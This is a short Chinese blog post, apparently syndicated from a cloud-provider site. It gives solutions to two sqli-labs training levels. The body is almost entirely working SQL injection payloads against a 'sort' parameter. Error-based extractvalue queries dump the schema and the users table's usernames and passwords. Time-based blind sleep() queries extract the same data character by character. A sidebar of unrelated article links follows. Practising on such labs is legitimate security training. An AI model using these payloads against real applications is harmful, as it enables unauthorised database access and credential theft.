当前位置:网站首页>SQL注入 Less47(报错注入) 和Less49(时间盲注)
SQL注入 Less47(报错注入) 和Less49(时间盲注)
2022-07-31 22:34:00 【华为云】
Less47和Less49都用不了rand()布尔盲注
因为有单引号闭合order by 'rand()' 这条语句显然是执行不了的
Less47
?sort=1' and extractvalue(0,concat(0x7e,database()))--+
?sort=1' and extractvalue(0,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security")))--+
?sort=1' and extractvalue(0,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users")))--+
?sort=1' and extractvalue(0,concat(0x7e, (select group_concat(username,password) from users)))--+
Less49
?sort=1' and sleep(5)--+
?sort=1' and if(1,sleep(5),0)--+
?sort=1' and if(length(database())=8,sleep(5),0)--+
?sort=1' and if(ascii(substr(database(),1,1))=115,sleep(5),0)--+
?sort=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101,sleep(5),0)--+
?sort=1' and if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1)='i',sleep(5),0)--+
?sort=1' and if(ascii(substr((select username from users limit 0,1),1,1))=68,sleep(5),0)--+
边栏推荐
猜你喜欢

数据分析(一)——matplotlib

Bika LIMS open source LIMS set - use of SENAITE (detection process)

Go1.18 upgrade function - Fuzz test from scratch in Go language

景区手绘地图的绘制流程

【论文精读】iNeRF

ThreadLocal
![[Open class preview]: Research and application of super-resolution technology in the field of video image quality enhancement](/img/d8/a367c26b51d9dbaf53bf4fe2a13917.png)
[Open class preview]: Research and application of super-resolution technology in the field of video image quality enhancement

Memblaze released the first enterprise-grade SSD based on long-lasting particles. What is the new value behind it?

Binary tree non-recursive traversal

Architecture Battalion Module 8 Homework
随机推荐
Daily practice——Randomly generate an integer between 1-100 and see how many times you can guess.Requirements: The number of guesses cannot exceed 7 times, and after each guess, it will prompt "bigger"
[Code Hoof Set Novice Village 600 Questions] Leading to the combination of formulas and programs
(26)Blender源码分析之顶层菜单的关于菜单
BM5 merge k sorted linked lists
什么是客户画像管理?
Go mode tidy reports an error go warning “all” matched no packages
【论文精读】iNeRF
How to get useragent
BM3 将链表中的节点每k个一组翻转
Realize serial port receiving data based on STM32 ring queue
A solution to the server encountered an internal error that prevented it from fulfilling this request [easy to understand]
uniapp小程序检查、提示更新
嵌入式开发没有激情了,正常吗?
程序进程和线程(线程的并发与并行)以及线程的基本创建和使用
Efficient Concurrency: A Detailed Explanation of Synchornized's Lock Optimization
Unity-LineRenderer显示一条线
HTC using official firmware as bottom bag made ROM brush card bag tutorial
In Golang go-redis cluster mode, new connections are constantly created, and the problem of decreased efficiency is solved
[Code Hoof Set Novice Village 600 Questions] Merge two numbers without passing a character array
一款国外开发的高质量WordPress下载站模板主题